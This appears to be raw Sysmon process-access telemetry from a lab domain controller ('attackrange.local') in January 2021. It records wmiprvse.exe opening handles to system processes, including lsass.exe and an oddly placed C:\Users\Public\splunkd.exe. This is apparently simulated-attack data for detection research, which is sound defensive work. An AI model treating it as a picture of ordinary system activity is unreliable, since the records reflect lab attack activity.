15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025936Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025935Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025934Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025933Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025932Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025931Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025930Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025929Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025928Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025927Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025926Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025925Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025924Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025923Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025922Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025921Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025920Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025919Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025918Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:34.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026276Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:35.835{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5367-6008-6606-00000000A301}3180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 